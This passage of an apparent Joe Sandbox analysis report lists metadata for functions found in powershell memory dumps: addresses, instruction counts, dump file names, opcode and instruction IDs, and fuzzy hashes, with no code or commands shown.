                                                                                                                  • Source File: 00000017.00000002.2473544356.00007FF9BB690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB690000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb690000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4029ee9820aa182734911993619192961e3b385b529135b8d8909fd1c254e381
                                                                                                                  • Instruction ID: 02e970517ea5e5bc98b689b15e57d1718fcdb3626764ac6ad6e0ba4b0eb89a32
                                                                                                                  • Opcode Fuzzy Hash: 4029ee9820aa182734911993619192961e3b385b529135b8d8909fd1c254e381
                                                                                                                  • Instruction Fuzzy Hash: 17021537C0DB5A5AE611FBBC74552E57BA4EF03378B1980B7D1CE8A0D3EC5878458A88
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB69B336 Relevance: .6, Instructions: 556COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2473544356.00007FF9BB690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB690000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb690000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fbaa645e6ea0ea8cfd294b8de68dec6f34670fae032c5cc4b6ddf5b766a3c8e3
                                                                                                                  • Instruction ID: 83247c3652d34177536c6fb5d0364d44c20513946a971308e58020f4000c14f6
                                                                                                                  • Opcode Fuzzy Hash: fbaa645e6ea0ea8cfd294b8de68dec6f34670fae032c5cc4b6ddf5b766a3c8e3
                                                                                                                  • Instruction Fuzzy Hash: 07028131E08A498FEB94EF6C9459BB877E1FF59311F0841FAD14DC72A2DE64AC418B41
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB5314F0 Relevance: .5, Instructions: 532COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2464311547.00007FF9BB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB530000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb530000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5be49ea2ff4a0093382ab8869e2dc72287d016bb39333ab763e08bf3d9e27e2a
                                                                                                                  • Instruction ID: ce39660104fc3369ec1a579bc5e7981846c9fe2002f24fc894f0d96ba595e88c
                                                                                                                  • Opcode Fuzzy Hash: 5be49ea2ff4a0093382ab8869e2dc72287d016bb39333ab763e08bf3d9e27e2a
                                                                                                                  • Instruction Fuzzy Hash: 01F10531A0CA494FE754EB28D8016B6B7E1FB56320F1582BBD14EC76D3DD69B8428781
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB6A11B6 Relevance: .5, Instructions: 476COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2473544356.00007FF9BB690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB690000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb690000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e173b7db5a0704e6f8baeb28c9919b233dee7042d511999a49f2f37bb360a32c
                                                                                                                  • Instruction ID: 88753c8c00c50295d593f1e09c212ea82a30613192a892069606ee61dbf591ea
                                                                                                                  • Opcode Fuzzy Hash: e173b7db5a0704e6f8baeb28c9919b233dee7042d511999a49f2f37bb360a32c
                                                                                                                  • Instruction Fuzzy Hash: F8E1D237C0DB69AAD611FFECB4051E5BB64EF03378B1584B7C18A89093E96478448E88
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF3449D Relevance: .5, Instructions: 475COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2427705825.00007FF9BAF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9baf30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8f444a3e9625ab8aca0d2fbd9262660871521486638a986f5abb65069bfb49d2
                                                                                                                  • Instruction ID: b9e802b6b3220548152f981ebe54716fbc59a6ee729accbd289f611b92b5e08e
                                                                                                                  • Opcode Fuzzy Hash: 8f444a3e9625ab8aca0d2fbd9262660871521486638a986f5abb65069bfb49d2
                                                                                                                  • Instruction Fuzzy Hash: FAE13835E0CA854BE355EB2DA4416F97BE0EF92323F1041BBD58AC7193DE68B8468781
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CC01D Relevance: .3, Instructions: 334COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bbf0e36aeba8da599207392cf405d7372a67793e6ad7eb4929eeeea0f88e1359
                                                                                                                  • Instruction ID: 22513afc2bec3a90960dadcdaad579b876ecbc0f36c1f0d93921c48110712ae2
                                                                                                                  • Opcode Fuzzy Hash: bbf0e36aeba8da599207392cf405d7372a67793e6ad7eb4929eeeea0f88e1359
                                                                                                                  • Instruction Fuzzy Hash: F5B12B3060D7884FD7A5CF3C8494A667FD1EF8B214B5447FAE089C75E7DAA8E9068341
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C9FFD Relevance: .3, Instructions: 333COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 118eca0bc9ccfb838fab3f1ca72db2d12b8b0a0720d916542a5cc743a7a86db1
                                                                                                                  • Instruction ID: dce97bfd43d29f390f55bd4874f3bedbdb72f586742fe5f3f81c2c67a618d821
                                                                                                                  • Opcode Fuzzy Hash: 118eca0bc9ccfb838fab3f1ca72db2d12b8b0a0720d916542a5cc743a7a86db1
                                                                                                                  • Instruction Fuzzy Hash: 16B1C73060D7894FE369DF3C84507A5BBE1EF8A314F1446BEE08ACB5E7CE69A9458305
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3B956D Relevance: .3, Instructions: 321COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e76ac84e2e6e719d7a93625f572f92cf5970c44af4c5b3a8f00ef2228f46ed56
                                                                                                                  • Instruction ID: 6940e325bdd22c2b8a6b06a4a0df9fbf7e1dee8e6cbbec982014c3987f3886c3
                                                                                                                  • Opcode Fuzzy Hash: e76ac84e2e6e719d7a93625f572f92cf5970c44af4c5b3a8f00ef2228f46ed56
                                                                                                                  • Instruction Fuzzy Hash: A4A19230A196494FD368EF3C805536AB7D2FF89214B148ABED14EC76E6DE79E9428300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C9C9D Relevance: .3, Instructions: 320COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e3f8d8cd9bf8d0cda415b4a1e05334a0844db8b420e6d95a51821ab74b21fec4
                                                                                                                  • Instruction ID: 041dcd4416762533ee15abd305e9c1c9918cebdfc94f5f7b37b2f6da01a1bee9
                                                                                                                  • Opcode Fuzzy Hash: e3f8d8cd9bf8d0cda415b4a1e05334a0844db8b420e6d95a51821ab74b21fec4
                                                                                                                  • Instruction Fuzzy Hash: AEB1E83060D6894FE36ACE3C84547A5BBE1EF86204F1547BEE08ACB5F7DE6899068701
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C996D Relevance: .3, Instructions: 308COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7b5e728f75ec9bc3aba6fd14b3a3384fc2c2923e47d189de203ec8c8477bcf77
                                                                                                                  • Instruction ID: 7673028d1e8e88da3f6000ae6369e7790f3ec8877767ffb2541157b532b6dd36
                                                                                                                  • Opcode Fuzzy Hash: 7b5e728f75ec9bc3aba6fd14b3a3384fc2c2923e47d189de203ec8c8477bcf77
                                                                                                                  • Instruction Fuzzy Hash: 23A1E53060D7854FE36ADB3C84507A5BBE1EF8A304F1547BED08ACB5E3DDA9A8468705
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C7C6D Relevance: .3, Instructions: 306COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 542c976a6dcb6b65f4a9785934171b8af6fbd604f9599d71a7ddef21cea76dd4
                                                                                                                  • Instruction ID: 4e37897e50deead5c66731461391b818b9181856f53e5538d330aec96db90dff
                                                                                                                  • Opcode Fuzzy Hash: 542c976a6dcb6b65f4a9785934171b8af6fbd604f9599d71a7ddef21cea76dd4
                                                                                                                  • Instruction Fuzzy Hash: A4A10B2060D6894FE3A5CF3C8494676BFD1FF8B214B5487BAE0C9C75E6DE68E9068301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CB86D Relevance: .3, Instructions: 304COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 75fa48d85a83e6f23f134e8a0a51702455a715de0bd8ba8145b48b3a95bddd7a
                                                                                                                  • Instruction ID: 2b7e014614a3f1852fb8427564b0a2a0e9f9dc43e3b813c45350482741b5368c
                                                                                                                  • Opcode Fuzzy Hash: 75fa48d85a83e6f23f134e8a0a51702455a715de0bd8ba8145b48b3a95bddd7a
                                                                                                                  • Instruction Fuzzy Hash: EA91F630A0D7894FE765DF3C845566A7BE0FF8A314B1446BAD08ACB1E6DE6CA9468301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CBD48 Relevance: .3, Instructions: 293COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c6aa1580bd4f8a1bc9d3d06f1824ee9639394559ace31de9f16b50be3a3354cc
                                                                                                                  • Instruction ID: 7c7eb2b8bf56f8f22f2611b8147898c3621fe84edd63cc4367de828a4ad27a61
                                                                                                                  • Opcode Fuzzy Hash: c6aa1580bd4f8a1bc9d3d06f1824ee9639394559ace31de9f16b50be3a3354cc
                                                                                                                  • Instruction Fuzzy Hash: 20A1F82060D7C98FE356DF3C84946697FE1EF8B314B1446EEE089CB5F7DA68A9498301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CA77D Relevance: .3, Instructions: 288COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f414b8dacb948b52e968def7066b1b6f8543c9367fc8a4d8eab46ecb2bc79c62
                                                                                                                  • Instruction ID: 713fe3f11c00ffd909131dbbe845db27e0d3086b606309514fc89d22f7399fdd
                                                                                                                  • Opcode Fuzzy Hash: f414b8dacb948b52e968def7066b1b6f8543c9367fc8a4d8eab46ecb2bc79c62
                                                                                                                  • Instruction Fuzzy Hash: 65810720A0E7894FE765CF7C98556A57FE0AF86210B0446FEE089CB1E7DA68B906C345
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CAACB Relevance: .3, Instructions: 269COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 83735298b797f67250858a1436ddd48468b584bfcd4d95850ec433ba6a3e1846
                                                                                                                  • Instruction ID: f826f5d93901ec27a6509530f2759e796d06e9c4b21d793f436f2c89b0adc411
                                                                                                                  • Opcode Fuzzy Hash: 83735298b797f67250858a1436ddd48468b584bfcd4d95850ec433ba6a3e1846
                                                                                                                  • Instruction Fuzzy Hash: 3C91E92060D6884FE769DF3CC4507697BE1AF8A304F5486BEE08ACB5F7DE78A9059701
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C5B2D Relevance: .3, Instructions: 255COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: afeb01b196c7dfcd211702b15cb74542552a18c4dcd85b42a16e6c1eb5e8ffbd
                                                                                                                  • Instruction ID: 28b60698419f76e34ac5f50bb2a1d5550a1432ac6da5c39edcaaa05f22a0a0a4
                                                                                                                  • Opcode Fuzzy Hash: afeb01b196c7dfcd211702b15cb74542552a18c4dcd85b42a16e6c1eb5e8ffbd
                                                                                                                  • Instruction Fuzzy Hash: 8381F52060D7894FE369DF3CC8516657FE1EF86304B1546FEE08ACB5E7CE68A9068341
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3B2DFD Relevance: .2, Instructions: 248COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c65c32b97ebb9aa86ce2d80987a0ebdb001619583c287fa0008b29f72faaed68
                                                                                                                  • Instruction ID: 82661f084986b2de36da91dbada2228e5f5eaeacb04d28fcc45c589278bdd710
                                                                                                                  • Opcode Fuzzy Hash: c65c32b97ebb9aa86ce2d80987a0ebdb001619583c287fa0008b29f72faaed68
                                                                                                                  • Instruction Fuzzy Hash: 6E71F730A19A494FD3A4EF3C845536ABBD2FF89354B1446BAD14EC72E2DE78E9428740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C5FAD Relevance: .2, Instructions: 242COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 01616bd26a6fe90d8b01bad8ca0137b1265c94a4158852d33c8c9900e1ba8596
                                                                                                                  • Instruction ID: e2a863b4d6421b5ea41c7f3f5e9a20fe931055b6b6cf6d57f237a93968816189
                                                                                                                  • Opcode Fuzzy Hash: 01616bd26a6fe90d8b01bad8ca0137b1265c94a4158852d33c8c9900e1ba8596
                                                                                                                  • Instruction Fuzzy Hash: E6710A2060D7884FE769DF3CC8506657FE1AF86214B1447BEE08ACB5E3DE78E9468301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CA35D Relevance: .2, Instructions: 239COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 276c02ac69160c2245917c822e9f6d54e0d40621c239703e5a2a97199eaccca7
                                                                                                                  • Instruction ID: 78fc6c0b8f3216dd26342cefd53bce9469614f40381bc668521b0b5c44eacb68
                                                                                                                  • Opcode Fuzzy Hash: 276c02ac69160c2245917c822e9f6d54e0d40621c239703e5a2a97199eaccca7
                                                                                                                  • Instruction Fuzzy Hash: 6E71172060D7C84FE769CF3C8854AA57FD1EF86214F1487BEE08AC75E7DE68A9069701
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3B3F6D Relevance: .2, Instructions: 238COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 16b27ce103bc2f060866a2b7c6180344da7da35794647cb543b2343a06483058
                                                                                                                  • Instruction ID: a143f34fa0cec25bc704ca43c981fa5b2aead2a2635e95f4efe4721b92aa30d7
                                                                                                                  • Opcode Fuzzy Hash: 16b27ce103bc2f060866a2b7c6180344da7da35794647cb543b2343a06483058
                                                                                                                  • Instruction Fuzzy Hash: 3961F430A196454FD7A5EF3C84553AAB7E2FF89314B1446BEE04EC72E2DE79E9428300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CC7AD Relevance: .2, Instructions: 235COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4ff7c1c9f7d7c8eb587ca6122e2329ec5d76efb087f6091a50b690ea0d45b499
                                                                                                                  • Instruction ID: 8e6913a922b9aa5e616db9ee54ad768c398c368c1a06cb7e39ff87d22e477ba3
                                                                                                                  • Opcode Fuzzy Hash: 4ff7c1c9f7d7c8eb587ca6122e2329ec5d76efb087f6091a50b690ea0d45b499
                                                                                                                  • Instruction Fuzzy Hash: 5771063060D7854FE769DF3C84507A6BBE1EF86314F1446BEE08AC75E3CEA8A9068341
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C449D Relevance: .2, Instructions: 223COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2e834b0332147462f9799e29b6f1371cf8c8ae2e09bf05175c66dcc53ad6f6eb
                                                                                                                  • Instruction ID: 4fbfd3bafdf3ce14b12267d3faefa9a54d10c09a7301fc5f42e0c629ff2cf23c
                                                                                                                  • Opcode Fuzzy Hash: 2e834b0332147462f9799e29b6f1371cf8c8ae2e09bf05175c66dcc53ad6f6eb
                                                                                                                  • Instruction Fuzzy Hash: 3F61172060D7894FE769DF3CC8506A57FE1EF86214B5446BEE08ACB5E7DE68A9068301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CC33D Relevance: .2, Instructions: 221COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1965c26adbefbb22ea7d73dca01cdbf7d684b6f4057c8e0677613c46c34e2541
                                                                                                                  • Instruction ID: feb61b393e0ee8b76e6db4da551b402ef0058edddaa73bca141c63e3c8675afc
                                                                                                                  • Opcode Fuzzy Hash: 1965c26adbefbb22ea7d73dca01cdbf7d684b6f4057c8e0677613c46c34e2541
                                                                                                                  • Instruction Fuzzy Hash: 8C613B3060D7894FD365DF3CC854A767FD1FF8A22075887BAE089CB5E6DAA8E9058341
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CA52D Relevance: .2, Instructions: 220COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ab476b12f592dd9963ae89d5794cf7690c33bdeb1bdeadebcae9eda78302fcf9
                                                                                                                  • Instruction ID: 3f9c07a61b4b2d35fc7f2cbb967ed81c05fcb298457827c4a0578eb0a7ad8ff5
                                                                                                                  • Opcode Fuzzy Hash: ab476b12f592dd9963ae89d5794cf7690c33bdeb1bdeadebcae9eda78302fcf9
                                                                                                                  • Instruction Fuzzy Hash: 48613A20A0D7894FD765CF3C8454AA57FE0FF8A310F5487BAD089C75E7DA68E9068741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C7A14 Relevance: .2, Instructions: 209COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6d00599a1762374740313be8999f35671f1a4e26d595e85dd7a312cdaf53ea65
                                                                                                                  • Instruction ID: 6a7d110a332bbbd45901207fab5f05ab3e3582ddc65dc6b3a434ce4d1a9d6612
                                                                                                                  • Opcode Fuzzy Hash: 6d00599a1762374740313be8999f35671f1a4e26d595e85dd7a312cdaf53ea65
                                                                                                                  • Instruction Fuzzy Hash: 4361ED5060D6894FD7A5DF3CC490A767FD1FF8A214B5487BAE089CB5E6CE74E9068301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CB61D Relevance: .2, Instructions: 207COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ed5a420fc92f3628c32ebc0f63e2da8243c78bda78170393e414a080b05a974d
                                                                                                                  • Instruction ID: da2bc939f48c32f91062919072511ffb32f77562e67a86a92952f8acdd3f33ed
                                                                                                                  • Opcode Fuzzy Hash: ed5a420fc92f3628c32ebc0f63e2da8243c78bda78170393e414a080b05a974d
